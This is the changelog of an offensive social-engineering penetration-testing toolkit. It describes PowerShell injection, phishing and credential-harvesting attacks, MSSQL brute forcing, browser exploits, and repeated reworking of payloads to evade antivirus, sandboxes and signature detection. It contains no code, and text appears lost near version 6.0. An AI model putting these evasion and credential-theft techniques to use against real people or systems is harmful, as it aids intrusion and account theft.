~~~~~~~~~~~~~~~~
version 6.5
~~~~~~~~~~~~~~~~
* added brand new attack vector HTA attack and incorporated powershell injection into it
* fixed a prompt that would cause double IP questions in certain attack vectors
* slimmed down powershell injection http/https attack vectors in order to use in payload delivery
* added exploit to browser attack Adobe Flash Player ByteArray Use After Free (2015-07-06)
* added exploit to browser attack Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow (2015-06-23)
* added exploit to browser attack Adobe Flash Player Drawing Fill Shader Memory Corruption (2015-05-12)
~~~~~~~~~~~~~~~~
version 6.4.1
~~~~~~~~~~~~~~~~
* fixed config related issue in seautomate, seupdate, and msf payload generation
* fixed an issue causing src to be undefined in infectious media generator
~~~~~~~~~~~~~~~~
version 6.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause 32-bit powershell injection from possibly not working
* fixed an issue that would cause payloads to not fire when powershell injection occurs
* restructured how bleeding edge is written initially and no longer overwrite sources.list
* removed slim_set, was used for pwnie way back and is no longer needed
* cleaned up an old mailing_list.txt format that is no longer needed
* rehauled the config directories, no longer is there a config/ directory within the SET root directory, it is now under /etc/setoolkit/set.config
* added dynamic import updates to /etc/setoolkit
* factored config changes from git pull request to fix grammar and formatting
* slimmed down powershell injection code by 32 bytes
* reworked config imports from harvester and cloner for the new config format
* rewrote portions of powershell injection to incorporate and handle reverse_http and reverse_https
* slimmed down powershell injection code more, and give two flag variables to shave shellcode off in order to support http/https payloads
* fixed an import config error issue when using web harvester
~~~~~~~~~~~~~~~~
version 6.3.2
~~~~~~~~~~~~~~~~
* rewrote pyinjector and multipyinjector to evade sandbox technologies
* added user + kernel debugger detection and automatic termination of payloads
* bundled binaries in virtual machine containers for added detection resilience
~~~~~~~~~~~~~~~~
version 6.3.1
~~~~~~~~~~~~~~~~
* rewrote the solo payload generation into its own payload delivery that piggy backs the existing menu system
* fixed an issue when creating the payload and listener options (option 6) would specify src was not found - this was due to a code cleanup project from versoin 6.3
* rewrote the autorun to function accordingly with new solo
* optimized and rewrote code base for payload creation - eliminated lots of old lines of code
* rewrote autorun code and optimized to leverage solo and slimmed down code base
* fixed an issue that would cause autorun to not work when relaunching
* fixed an issue that would cause browser autopwn to use the old program_junk folder vs. /root/.set/ folder data
* added \r\n\r\n returns to all msfconsoles - people get confused without having that extra enter in place thinking msfconsole is broke
* added \r\n\r\n to all meta_config generations when using msfconsole -r for resource files
~~~~~~~~~~~~~~~~
version 6.3
~~~~~~~~~~~~~~~~
* removed old payloads that were no longer needed - pyinjector and multipyinjector to the job, standard meterpreter payloads all get picked up regardless of encoding
* fixed an issue causing PDF templates from not being properly created when selecting solo
* added ability for custom exe to properly execute when deploy binaries is still specified to OFF (it has to)
* rewrote java applet to incorporate custom binary selection
* added check to deploy binaries to auto select yes parameter 8 automatically
* removed disitools from SET - no longer needed in custom binary
* removed legit binary, no longer needed
* removed three config options no longer needed
* defaulted the memory injection technique as the main method for old payloads
* added additional obfuscation around AES generation and making sure static sigs cant hit it
* stablized MSSQL bruter and injection through powershell
* fixed webjacking that would cause the menu to bomb out if invalid responses
* fixed an issue when importing a custom payload, it would try to kick off a listener which it shouldnt
* added additional wording about when specifying a custom payload that you will need to create your own listener
* added flag replacement variable for param name 8 which will indicate a randomized four alphanumeric for custom payload delivery - this will allow custom payloads to function properly without triggering powershell or other exploitation methods
* added the ability for powershell to execute first and if successful then not drop binary stager as last resort
* added a workaround for a metasploit bug that would cause bundle install issues when launching directly within the /opt/metasploit/apps/pro/msf3 directory or within the /usr/share/ framework directory. I first check for /usr/bin/msfconsole first and if there I do not append to the path variable in order to launch from anywhere
* added ability to use default msfconsole launcher if applicable from any path instead of from home directory - fixed in psexec, powershell injection, java applet, custom payloads, etc.
* randomized custom parameter name when deploying custom binaries to throw off static signatures
~~~~~~~~~~~~~~~~
version 6.2
~~~~~~~~~~~~~~~~
* changed IP address for the payload listener to specify LHOST
* included TDS as a standard impacket library
* added port to MSSQL display when compromising system
* moved create_payloads in payloadgen to be compliant with msfvenom creation and moved off msfpayload and msfencode
* fixed multiple files still using msfpayload or msfvenom
* fixed a bug that caused a tds exceptions error when using the SQL attack (missing tds library)
* updated specific wording in setoolkit launcher
* slimmed powershell injection code to reduce injection code by about 17 bytes
* completely randomized the java applet to the point where it will randomize the name, no longer uses Signed_Update.jar - there were signatures floating around that were detecting it based on static names
* randomized and obfuscated pyinjector code base and locked into its own virtual container and debugger protection
* randomized and obfuscated multi pyinjector code base and locked into its own virtual container and debugger protection
* added the java applet to now smart detect if powershell is installed, if it is then it will not download an executable which could be used on detection capabilities. Powershell is plenty stable and should not require any deviations for a binary to be downloaded.
* added ability to check if certain paths are legitimate, if they are will deploy payloads via java applet
* full msfvenom support and conversion off msfpayload msfencode
* removed old call for impacket tds compatibility
~~~~~~~~~~~~~~~~
version 6.1.2
~~~~~~~~~~~~~~~~
* fixed powershell injection where payload would not properly generate when using pyinjector
* fixed menu option error when using multi-attack vector
~~~~~~~~~~~~~~~~
version 6.1.1
~~~~~~~~~~~~~~~~
* removed bleeding edge as a default option when launchin SET - it has since been moved into config/set_config and can be turned on by switching BLEEDING_EDGE to on. Use at your own risk - it can break stuff
~~~~~~~~~~~~~~~~
version 6.1
~~~~~~~~~~~~~~~~
* fixed a bug that would throw a directory already created exception when using shellcode injection for Arduino
* fixed a bug when reverse_http/https was specified under powershell prep, it would not properly handle patching IP address or port
* fixed a bug where TDS would not be recognized as installed on updated impacket systems
* removed disable database support on psexec
~~~~~~~~~~~~~~~~
version 6.0.5
~~~~~~~~~~~~~~~~
* fixed an issue with fasttrack built-in attack with RIDENUM - would not properly close built in brute force file causing an exception
* converted powershell injection to use -win hidden instead of -win hid, for some reason some versions of Windows get mad and don't execute the code properly
* fixed powershell injection in mssql bruter
* added better upper/lower handling in options in mssql bruter
* fixed an issue causing timing issues in mssql bruter powershell injection technique
~~~~~~~~~~~~~~~~
version 6.0.4
~~~~~~~~~~~~~~~~
* fixed an issue that would cause credential harvester, tabnabbing, and webjacking to not properly redirect after successful credential nab
~~~~~~~~~~~~~~~~
version 6.0.3
~~~~~~~~~~~~~~~~
* added a check in for twitter logins - they are doing client-side validation if root isn't twitter.com - added a rename on function variables to get around the password field not being allowed to be entered
~~~~~~~~~~~~~~~~
version 6.0.2
~~~~~~~~~~~~~~~~
* changed powershell injection technique to not exitonsession when creating the metasploit.rc file when specified in the powershell menu, this was already enabled when using psexec or other methods
* shrunk the powershell injection code command, not as much length needed - useful for shorter payloads
* slimmed down actual encoded powershell injection code, removed un-used code from the central powershell routine
* fixed a few typos and alignment on licensing agreement within SET and minor silly modifications to license
* fixed coloring when exiting and alignment for purpose of good disclaimer
* added print_status to bleeding edge tracking
* fixed unresponsive powershell injection when uses windows 8
* changed java applet user agent string inside applet to evade java blockers
* removed old ID and value parameters from the Java Applet database, no longer used based on changes through Java 7 update 42 - SET now uses manifest files
* fixed unsigned.py moving to unsigned libraries
* rehauled downloader inside java applet
~~~~~~~~~~~~~~~~
version 6.0.1
~~~~~~~~~~~~~~~~
* fixed menu system to remove sms spoofing (no longer supported)
* redesigned powershell injection to be much more efficient
* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
* added option to fall back to old method if powershell injection fails (option menu)
* start msf listener first, wait for msf to launch, then trigger vulnerability
* threaded the powershell injection command through mssql
* updated wordlist to include a couple more wordlists found in the wild
~~~~~~~~~~~~~~~~
version 6.0
~~~~~~~~~~~~~~~~
* fixed psexec which would only bring one shell back instead of as many as you used for the host
* fixed an issue that would cause metasploit payloads to not be properly generated when using msfvenom, this was due to a code change requiring -f
tags first and if not found then it injects into
tags * added ability to render even when
flag is being used versus * added more stability to the Java Applet.jar and backup routine for redirect to websites * bug fix in website cloner * rewrote portions of java applet to gain more stability around java repeater as a fallback * added better handling around unc database and fixed a bug when in the wrong loop within cloner.py * established a baseline fallback for java applet * added rhino java exploit into Metasploit Browser exploits * fixed a bug that would call wrong payloads getting confused for fileformat versus browser * added better error handling around mssql and fasttrack * added disabled message for web profiler for right now * added better handling around smtp email if someone inserts something on one line and doesnt hit enter, then control-c would throw an exception * bug fix that would not launch the linux or osx handlers for MSF * added the option in set_config to run autorunscripts in linux meterpreter sessions separate from windows meterpreter sessions * added post/osx/gather/enum_osx to autorun in the osx shell for better osx shell support ~~~~~~~~~~~~~~~~ version 2.4.2 ~~~~~~~~~~~~~~~~ * Fixed a bug in multiattack vector where specifying java applet attack and shellcode exec would not properly inject alphanumeric shellcode into applet properly * Restructured multiattack vector to properly clone, prep payload delivery, then inject alphanumeric shellcode * Added better handling around multiple attack vectors * Fixed a bug that caused msfvenom to bomb out if path was /opt/framework3/msf3 versus /opt/framework/msf3 * Added better handling around multiattack * Fixed a bug with self signed certificates would continue to show Microsoft versus what you sign it with * Changed java applet to load and render at bottom of body versus in head. Page should now load with Java Applet appearing * Fixed a bug where Java Repeater would not load properly when executed due to a incorrect loop within cloner.py * Added the ability to use filename for import versus directory * Added the ability to import index.html files versus just the folder on the custom import feature ~~~~~~~~~~~~~~~~ version 2.4.1 ~~~~~~~~~~~~~~~~ * Fixed a timing delay bug in port scanner for slow connections, would timeout and not recognize port * Fixed a parsing error in portscanner when using single ip addresses * Added optimization around mssql-bruter in Fast-Track * Added new windows shell option on compromised systems as an alterantive option to debug/powershell attack * Tuned mssql bruter to work better with SQL Server 2007 * Added automatic enable of xp_cmdshell through show advanced options in the windows shell * Added better error handling through mssql bruter forcer * Added error handling around xp_cmdhshell enablement * Fixed a bug that would cause mssql bruter to not stop after it successfully brute forced an account * Added better stability all around to the fast-track mssql bruter * Bug fix on fileformat bugs that would ask for the attachment ~~~~~~~~~~~~~~~~ version 2.4 ~~~~~~~~~~~~~~~~ * Rehauled the fake ap attack for menu style and stability * Added the option for fake ap attack to use either a 10.0.0.0 or 192.168.10.0 IP ranges * Added commands to properly bring up tun interface in fake ap attack * Added variables to the dhcp3 launch command for stability * Added some color styling to the check_length error message * Fixed a minor code issue in stop_wifiattack.py * Fixed a minor issue that caused the log file to error out if file was not found * Added a descrpition if no MSSQL servers were identified during a scan * Fixed a bug that would brute force a null IP address * Fixed a bug in the man left in the middle that would cause it to error out * Bug fix for the mssql bruter / port scanner. * Bug fix for sendmail that would cause an error message. ~~~~~~~~~~~~~~~~ version 2.3 ~~~~~~~~~~~~~~~~ * fixed a bug that would not load the menus properly when loading SET (bad return placement) * fixed an annoying bug that has been around for a number of versions, finally tracked down..some occasions where it would show "Moving payload to website", you couldn't control-c out to exit and would have to close the console window. This has been resolved. * rewrote shellcodeexec again to evade AV * added the shellcodeexec.c modified source code * removed improper way to mask error messages through 1> /dev/null and 2> /dev/null, pipe information through subprocess.PIPE instead * fixed a bug in fast-track with the mssql bruter where if using the SET interactive shell, it wouldn't spawn the HTTP server properly due to to site.template and attack.vector files not being found. Added better granularity on detecting files and setting defaults if its not found * adjusted the repeater time to 2 seconds versus 3 * added additional passwords found in pentests to the wordlist * removed excess code from setcore * moved Signed_Update.jar that is generated through Java Applet attack it now goes through src/program_junk versus src/html * rewrote large portions of SET to place cloned websites and files under src/program_junk/web_clone versus src/webattack/web_clone/site/template * added new config option for OSX/LINUX payload ports and removed the automatic prompt after generating metasploit payload if you want to target OSX/Linux. It will automatically target Linux/OSX and removes another prompt in setting everything up * added additional stability to powershell injection, it is now enabled by default. If powershell is injected, it will send a payload straight through memory versus touching disk. Note that you may get two shells back. This is intentional as its a failsafe if the one method fails through powershell. So regardless, if the powershell injection fails to compromise, the backup dropper will still execute * bug fix in mssql.py where it would throw an error about not finding the proper payload in the fasttrack mssql bruter ~~~~~~~~~~~~~~~~ version 2.2.2 ~~~~~~~~~~~~~~~~ * Added significant stability to the java applet which caused a repeating loop of the java applet * Added significant stability around the java applet when powershell might be active but still did not trigger, it will fall back into another applet * Added better performance and cleaned up code around Java Applet * Recompiled shellcodeexec to evade AV * Turned auto_migrate to optional versus automatic, can be buggy sometimes * Added the ability to see actual brute force attempts on SQL servers and notify you when you were unable to brute force a SQL server * Added better detection around finding msfvenom for powershell injection incase it was not in normal path routines * Removed black box when executing powershell - shellcode through the teensy device * Cross compiled the binary to be compliant for x86 based systems with shellcodeexec, the latest version didn't use MT and used MD when compiling * added p.stream handling to remove hangs when using the java applet stream for powershell injection (thanks leg3nd) ~~~~~~~~~~~~~~~~ version 2.2.1 ~~~~~~~~~~~~~~~~ * Added stability to the powershell attack through the java applet * If powershell injection is enabled and SETSHELL/RATTE is chosen, it will disable it automatically as the two are not compatible * Added a new config option to use verbose on the powershell injection, it will show you the encoded command that will be used on the victim machine * Got a patch from Dale Lakes on check_mssql, does smart detection on yum/apt for automatic installation ~~~~~~~~~~~~~~~~ version 2.2 ~~~~~~~~~~~~~~~~ * Added better handling when generating your own legitimate certifcate and ensure proper import into SET * Adjusted java repeater time to have a little more delay, seems to be more reliable and stable if that occurs. * Removed the check from the main launch of SET for pymssql and only added it when the fast-track menu was specified * Removed the derbycon posting since it already happened. When we get closer I'll re-add it back in with detailed information * Removed old files in the java applet attack that were not needed. * Added better granularity checking the Java Applet attack when the shellcode exec or normal attacks were being specified. * Fixed a bug that caused infectious media bomb out if shellcodeexec was specified as a payload * Added a legal disclaimer for first inital use of SET that is must be used for lawful purposes only and never malicious intent * Added improved stability of the java applet attack through better payload detect/selection * Fixed a bug with shellcodeexec and creating a payload and listener through SET, it would throw an exception, it now exports shellcodeexec properly and exports alphanumeric shellcode * Added new config check inside core.py, will return value of config, easier..will gradually replace all config checks with this * Fixed an issue that would cause AUTO_REDIRECT=OFF to still continue to redirect. This was caused from a rewrite of teh applet and the same parameters not being filtered properly * Added more customizing Options to RATTE. Now you can specifiy custom filename ratte uses for evading local firewalls. So you can deploy RATTE as readme.pdf.exe and it will run as iexplore.exe to bypass local firewalls. You can although specify if RATTE should be persistent or not. For testing network firewalls you won't need a persistent one. Doing a penetration test you may choose a persistent configuration. * Fixed a bug in RATTE which could break connection to Server. RATTE now runs much more stable and can bypass high end network firewalls much more reliable. * Added a new config option called POWERSHELL_INJECTION, this uses the technique discovered by Matthew Graeber which injects shellcode directly into memory through powershell * Added a new teensy powershell attack leveraging Matthew Graeber attack vector. * Rehauled the Java Applet attack to incorporate the powershell injectiont technique, its still experimental, so will remain OFF in the config by default. The applet will not detect if Powershell is installed, and if so, use the shellcode deployment method to gain memory execution without touching disk through PowerShell. * Fixed a bug that would cause mssql bruter to error if powershell injection was enabled or other attack vectors ~~~~~~~~~~~~~~~~ version 2.1.1 ~~~~~~~~~~~~~~~~ * Moved how custom templates first generated payloads then cloned. Switched in order to make sure shellcodeexec is now compatible with the custom templates * Cleaned up code in the creation of shellcodeexec * Fixed a sendmail issue where authentication failed wouldn't properly send the right data * Fixed a bug where shellcodeexec would not properly execute under certain circumstances * Added a check for sendmail if it isn't installed it asks you to install it ~~~~~~~~~~~~~~~~ version 2.1 ~~~~~~~~~~~~~~~~ * Added new menu for fasttrack integration * Defined new folder structure for fasttrack integration * Rehauled the initial menu to slim down and break into social-engineering attacks versus Fast-Track attacks * Added new core module through setcore called kill_proc * Added new core module through setcore called meta_database * Added new autopwn functionality through fasttrack/autopwn.py, with the additions of fasttrack, the code is being completely redone, nothing will be the same * Added a new config option called METASPLOIT_DATABASE. This will be what database type to use with metasploit, default is postgresql * Restructured normal set to be a new main menu versus just a calling stager. set.py and fasttrack.py will be the two main files for the functionality behind SET * Added scapy packet manipulation tool into src/core for indepth protocol creation lateron * Added portscan.py into core, this is a fast port scanner that will be used versus leveraging third party modules * Added new mssql module for port scanning mssql through the fasttrack menu * Added validate IP in the portscan to check if a solo IP address is legitimate * Added new definition scan() into the fasttrack mssql module * Added _mssql module as a dependancy and updated setup.py to include it during installation * Added new core module check_mssql() to ensure proper import for pymssql for Fast-Track attacks * Added new definition brute() for mssql brute forcing within fasttrack * Added the ability to use a mssql shell for raw queries for microsoft SQL based systems * Added the ability to do either powershell or h2b attack method via windows debug to sql bruter * Added new function call launch_hex2binary in the mssql module in fasttrack * Fixed a bug in the interactive shell when quitting out caused a global exception for socket(AF) versus socket.socket(AF). It no longer throws an exception * Added all payloads from SET including interactive shell, ratte, and others into the MSSQL Bruter in Fast-Track * Added the ability to leverage powershell to deploy in Windows 7 and Server 2008 x64 bit systems where debug is removed * Added the ability to use Metasploit based payloads within the mssql bruter * Added a background http server nonthreaded to keep alive when SET does the mssql bruter * Added a new expoits section to the fast-track menu, this will be the ultimate home for custom exploits and such * Added MS08-067 to the new exploits section in the fasttrack menu * Added the Mozilla Firefox 3.6.16 mChannel Object Use After Free Exploit (Win7) in the fasttrack exploits menu section * Added additional spacing around the SET interactive shell to clear it up a bit when doing menu selection * Added the ability to trigger the auto re-enable of the xp_cmdshell stored procedure if disabled * Added the Apple QuickTime PICT PnSize Buffer Overflow from Metasploit to the Spear-Phishing attack vector * Added the Mozilla Firefox 3.6.16 mChannel use after free vulnerability from Metasploit into the Metasploit Browser attack vector * Added the Apple Quicktime PICT PnSize and FireFox 3.6.16 mChannel use after free to the SET-web interface * Fixed the menu structure around the web gui to reflect the new menu change with 1 - being social-engineering attacks versus all on the initial screen * Added the latest teensy attacks into the web gui, includes gnome wget, binary 2 teensy, sdcard teensy, and X10 arduino jammers * Added an awesome new option in the java applet attack vector, it will allow you to select shellcodeexec which means the Java applet will now deploy shellcodeexec then execute alphanumeric shellcode. Meterpreter will never touch disk! * Rewrote the java applet quite a bit to reflect the new changes on the java applet * Added new options in payloadgen for the java applet new menu structure for shellcodeexec * Added reverse meterpreter, reverse https, reverse http to the shellcodeexec attack * Fixed a bug that caused the create a fileformat payload to error out when specifying certain payloads * Added similar format to new menu structure to the SET interactive shell * Fixed some carriage return issues within the SET interactive shell * Fixed a bug that caused java repeater to not work properly (thanks Kevin Mitnick for bug report) * Added better URL handling of java repeater for post acceptance redirect * Fixed a long standing bug that would randomly cause internet explorer to crash, had to do with java applet and waitfor() on bufferstreams * Custom compiled shellcodeexec to not print any output and obfuscate * Added randomized obfuscation on shellcodeexec to randomize each time its deployed * Fixed a bug in SET interactive shell that would randomly cause bypassuac to throw an uploads exception * When auto-detect is turned off, it wouldn't allow you to enter a hostname, this has been fixed * Added full path variables for when generating shellcodeexec binaries for people with strange path variables ~~~~~~~~~~~~~~~~ version 2.0.3 ~~~~~~~~~~~~~~~~ * Rehauled the entire core library to be setcore which required major recoding of most modules * Added new path variable for msf4 /opt/framework/msf3 * Added additional color schemas to core.py including background colors * Added check_length for min/max for a payload selection in core.py * Fixed some bugs that was causing listener to not work properly since core was not imported right * Added color to the main setprompt, its a dark cyan * Fixed a socket module not callable type error in SET interactive shell listener * Updated the svn update for Metasploit to call meta_path versus doing it through fileopen calls. Now incorporates new directory path in BT5 * Fixed the "name 'core' is not defined" bug in arp_cache.py and solo.py * Fixed a bug in the IP validation check * Added better error handling around the phishing attack vector within SET and GMAIL PDF illegal detection * Fixed a bug when download + execute was specified during binary2teensy attack vector, thanks Kevin Mitnick * Added a check to see if sendmail was installed when using spear phishing attack * Fixed a java repeater issue due to timing issues ~~~~~~~~~~~~~~~~ version 2.0.2 ~~~~~~~~~~~~~~~~ * Fixed a bug where you couldn't go back into mass mailer attack if it was previously used (bad import) * Changed some flow of the smtp_client a little bit, was getting way to complex * Fixed a bug in create a payload/listener where SET wouldn't properly pack msf.exe using UPX * RATTEServer now uses -static compilation and works on all platforms now * More major menu rehauling and how SET behaves during interactive mode * Version information now pulls from core.py versus static file under src/version ~~~~~~~~~~~~~~~~ version 2.0.1 ~~~~~~~~~~~~~~~~ * Added slim_set.py in config, will slim down the SET instance * Added a new config option in set_config to turn SET_Interactive shell to off which will mean you need to spare some room in SET. * Changing the structure of how menus look, so when you go to phishing, you know your in the phishing menu, when your in webattack you know you're there * Added core function set_check to see if interactive shell is turned on or off * Added new core function to standardize menu output for option 99 * Added a 99 backout menu to the infectious media menu * Fixed a bug that would cause updating SET or Metasploit to throw an exception. Changed to call core.update_set() versus update_set() * Updated set_config with instructions to install Sendmail as it is not included by default in Backtrack5 * Fixed a bug in Binary2Teensy that would improperly call the Teensy payload menu * Fixed a couple bugs in smtp_client and added new menu mode into mass mailer ~~~~~~~~~~~~~~~~ version 2.0 ~~~~~~~~~~~~~~~ * Removed un-needed assignment in core around create random string * Added the Binary2Teensy option in the Teensy menu, this will allow you to create a payload and inject alphanumeric shellcode through shellcodeexec in a new technique released at BSIDESLV * Changed the path of metasploit to be /opt/msf3/framework3 versus /pentest/exploits/framework3 * Added the ability for multiple payloads in binary2teensy attack * Added the ability to leverage the SDCard mounted Teensy device with payload generation without mounting the SDCard to the victim machine * Fixed a bug where webattack_email turned on would not trigger based on a wrong path * Updated the phishing attacks in the infectious media site and phishing site in the web GUI interface * Updated the Wireless Access Point Attack to choose the monitor interface that is most recently created * Changed the menu output, this is the first of many changes on how the menu interacts * Added an X10 Sniffer into the Arduino based attack vectors * Added an X10 Jammer into the Arduino based attack vectors * Changed the menu option to reflect Arduino based attack vector versus Teensy * Added a starttls check for authentication around sendmail * Fixed a bug in mass mailer that would cause gmail to be set versus smtp relay * Added the SD2Teensy OSX attack vector which targets OSX machines by dumping from the converts.txt storage drive on the teensy * Added additional exploits into client-side attacks for the browser exploits * Added additional exploits into the spear-phishing attacks * Fixed a bug where SET would not properly check for running Apache servers and stale SET processes ~~~~~~~~~~~~~~~~ version 1.5.3 ~~~~~~~~~~~~~~~ * Large menu rehaul and things moved to different places and code cleaned up * Fixed the logging problem that would not generate log messages for errors in src/logs/ * Added print_status, print_error, and print_input in the core modules, all menus should now use this from now on * Added some alignment to some menus and made it flow better * Replaced linux reverse tcp shell with reverse meterpreter in the java applet attack vector (thanks dmdxs1) * Changed the web_port config to work in spawn.py which houses a lot of the web servers / listeners ~~~~~~~~~~~~~~~~ version 1.5.2 ~~~~~~~~~~~~~~~~ * Fixed a bug that would trigger an invalid shell if a connection was received in the SET interactive shell (thanks Paul Hallstein) * Changed interactive shell listener to not flag on invalid choice if return was hit versus an actual invalid option * Added the ability to see multiple shells coming in when in the selection menu, before you had to interact with a shell to see the other connections * Rewrote portions of the java applet to reflect sun java instead of microsoft as well as fix some bugs with the multi-platform shells * Added better handling around chmod for OSX/Linux detection in Java Applet * Cleaned up some code within the Java Applet * Added better connection handling and detection including threaded menu mode * Fixed a bug within the smtp mailer when webattack would be set to ON, it would throw an error, this has been resolved * Starting to work on a better downloader for the SET interactive shell. Goal is to have it leverage WriteProcessMemory and allocate enough space for the SET interactive shell to place into an existing process like explorer.exe, etc. * Removed custom packing of SET interactive shell, putting custom-UPX on top of PE sometimes causes corruption for some reason * Fixed an issue with MLITM was trying to import the wrong module and throw an exception * Moved verbose text from modules into text.py file * Now drawing most of the menus dynamically * Fixed a bug where spear-phishing would not properly send an email leveraging GMAIL (thanks Karthik!) * Fixed another bug that was affecting sendmail via spear-phishing * Fixed an issue where RATTE payloads would show up as 2 and 3 and be missing menu number one (thanks Christian Gelici) * Fixed an issue with payloadgen that caused msf.exe to not properly be created due to a variable messup (thanks f3bruary) * Fixed an issue where client-side exploits were not properly getting created (thanks f3bruary) * Fixed a bug where the dll hijacking would not properly execute * Standardized all menu returns/exits to the same number - 99 * Fixed a bug that caused file imports to fail thanks Lampis Alevizos! ~~~~~~~~~~~~~~~~ version 1.5.1 ~~~~~~~~~~~~~~~~ * Changed the order of ietabs exploit and aurora to be consistent * Complete rehaul of the directory structure, more to come. * A large restructuring has occured that maps all the folders to actual attacks. Still a work in progress * Added automatic import for jar_file.py that dynamically imports new Java.java files into the Java Applet if you want to make changes to the code ~~~~~~~~~~~~~~~~ version 1.5 ~~~~~~~~~~~~~~~~ * Added shell.py to support both Linux and OSX for the SET Interactive Shell, uses same code repository * Added shell to support Linux/OSX for SET Interactive Shell * Added download to support Linux/OSX for SET Interactive Shell * Added upload to support Linux/OSX for SET Interactive Shell * Added ps to support Linux/OSX for SET Interactive Shell * Added kill to support Linux/OSX for SET Interative Shell * Fixed a bug in mass mailer where TLS would execute after ehlo not before. Thanks pr1me * Changed download path to replace forward and back slashes with a _ so it would not cause strange nix issues with back slashes and forward slashes in the SET Interactive Shell * Added better integer handling when running listener.py by itself without specifying a port * Redesignated filename shell.binary to shell.windows and shell.linux (PE vs. ELF binary) * Added separate installers for shell.linux and shell.osx, to many differences between the two and needed different compiling. * Added instructions in shell.py how to compile for each flavor operating system including windows, linux, and osx * Added reboot now into the SET interactive Shell * Added persistence to the SET interactive shell with a completely custom written python-bytecompiled service. Essentially uploads service to victim, that calls interactive shell every 30 minutes * Added name distinguishing per windows/posix systems so it will show up :POSIX :WINDOWS on interactive shell, will also show :WINDOWS:UAC-SAFE and :WINDOWS:SYSTEM. * Added the MS11-050 IE mshtml!CObjectElement Use After Free exploit from Metasploit * Added dynamic packing to download/upload for persistence, better AV avoidance * Added MS11-050, Adobe Flash 10.2.153.1, and Cisco AnyConnect Metasploit exploits to the SET web gui * Added 'clear' and 'cls' in the SET Interactive Menu to remove whats in the screen, etc. * When using the java docbase exploit, removed 'Client Login' for title frame, isn't needed * Added back command to the SET interactive shell to go back when in different menus * Fixed a bug where it would state payloadprep not defined, it was caused to UPX not fully packing the device at time of upload, a 3 second delay has been added * Fixed a bug where creating a RATTE payload in option 4 would launch the SET interactive shell in mistake versus the RATTE listener. Thanks darkther4py * Fixed a bug where mass mailer would throw an indentation exceptions ~~~~~~~~~~~~~~~~ version 1.4.2 ~~~~~~~~~~~~~~~~ * Fixed the path to UPX in Back|Track 5 if installed to /usr/bin/upx * Added the latest Cisco AnyConnect download and execute exploit from Metasploit * Added a message prompt if Apache is not detected being running. If it isn't it will now ask if you want to start it (thanks ChrisJohnRiley) * Added auto migration into the Metasploit Client-Side attacks, previously it was only for Java Applet (thanks ChrisJohnRiley) * Changed the iframe width and height to be 100/100 to have better clips on Adobe PDF exploits (thanks ChrisJohnRiley) * Changed dnsspoof path to be reflective of Back|Track 5 * Added support for Yahoo and Hotmail, you can now configure it in the set_config file at the very bottom as EMAIL_PROVIDER * Changed the location of airbase-ng to be Back|Track 5 compliant * Fixed a child exception error when using the mass mailer and not selecting the listener * Handled mkdir commands better if directory was already there * Added multi-threaded support to the spear-phishing attack vector when sending emails out * Fixed a bug that caused the report generator in credential harvester to fail and not report findings accurately * Fixed a bug where visit statistics were not properly showing up in the exported report * Fixed a bug where using webjacking would not load index2.html properly when site had been jacked due to new logging added in the report_harvester and do_GET() handlers * Fixed a bug where using webjacking and java applet attack would not load java applet because of the new do_GET() handler, it now loads properly * Fixed a bug in mass mailer using sendmail, incorrect indentation * Added AP_CHANNEL to set_config to allow configuration of channels for airbase-ng, it wouldn't recognize as a valid AP without properly specifiying the channel (thanks pr1me and rejectedmaniac) * Fixed a bug where the sms templates were not properly loading filename extensions since moving the original templates directory (thanks dmdxs) * Fixed a bug when you selected web templates in Java Applet and you hit run it would try to redirect back to the local machine and continue to prompt for java applet even after execution. It now redirects back to the proper web template site * Fixed a literal 10 error message when using the SET interactive shell if you specified 'quit' before entering the interactive shell * Changed python path to /usr/bin/env python instead of /usr/local/bin/python since it doesn't work on OSX however /usr/bin/env python does ~~~~~~~~~~~~~~~~ version 1.4.1 ~~~~~~~~~~~~~~~~ * Fixed a bug where the SET web port would not configure properly if a different port was specified. Accidently put the check in the do_g$ * Re-enabled the SET interactive shell UPX polymorphic encoder addition, was buggy before seems to be find now * Added the source code for the bypassuac exploit under the set_payloads/uac_bypass/source directory * Moved the templates directory to src/templates instead of being in the root directory, less clutty in the main root * Cleaned up some outdated code in man left in the middle attack * Added a total number of hits to successful posts/credential harvesting from the harvester attack to the html report. When you finish with the credential harvester it will let you know how many people visited the site and how many people actually fell for the attack. * Added better error handling around the SET interactive shell when selecting a number to interactive with. If a string is detected it with flag the same message as if an invalid number was specified * Fixed an issue where automigrate was still running when using the linux/osx payload option in the Java Applet attack (thanks pr1me) * Looks like python-pefile is broke on 64-bit platforms which means the digital signature stealing is out on 64-bit. I added a check for platform architecture, if 64bit is detected it will disable digial signature stealing. If 32 bit is detected then it will run normally. This is a temporary fix until I can look at what's flagging in python-pefile and fix. * Fixed the pefile issue, was using a newer checksum method which caused it to die in 64bit, downgraded disitools to 0.1 which uses the older method which works in 64bit, digital signature stealing should work on all platforms now * Fixed a bug where the teensy payload menu would not properly run the Gnome Teensy HID based on a wrong-placed comment (thanks to Aaron Hine) * Fixed a small bug where the email counter would not increment on mass mailer, it would say Sent e-mail: 0 and would not increase as more emails were sent. (Thanks Larry Pesce!) * Fixed a bug where selecting create a payload and listener for the SET interactive shell would flag a payloadprep not defined exceptions. (Thanks Luca Grembo) * Added some additional obfsucation on the SET interactive shell. * Updated BeautifulSoup check for 3.2.0 instead of 3.0.8.1 * Reworked core module for meta_path into calls that were leveraging static metasploit_path variables. Allows me to centralize and add checks for better msf path detection. * Fixed a bug in clientside attacks that was throwing a meta_path exceptions (thanks Pr1me) * Fixed a bug where pre-defined templates would error out based on the path move to src/templates. Thanks macfan30! ~~~~~~~~~~~~~~~~ version 1.4 ~~~~~~~~~~~~~~~~ * Java changed how self signed certificates work. It shows a big UNKNOWN now, modified self sign a bit. * Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request. * Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path * Fixed a bug in the new backtrack5 to recognize airmon-ng * Added the ability to import your own code signed certificate without having to generate it through SET * Fixed an issue where the web templates would load two java applets on mistake, it now is correct and only loads one * Fixed a bounds exception issue when using the SET interactive shell, it was using pexpect.spawn and was changed to subprocess.Popen instead * Added better import detection and error handling around the python module readline. Older versions of python may not have, if it detects that python-readline is not installed it will disable tab completion * Added a new menu to the main SET interface that is the new verified codesigning certificate menu * Fixed a bug with the SET interactive shell that if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if 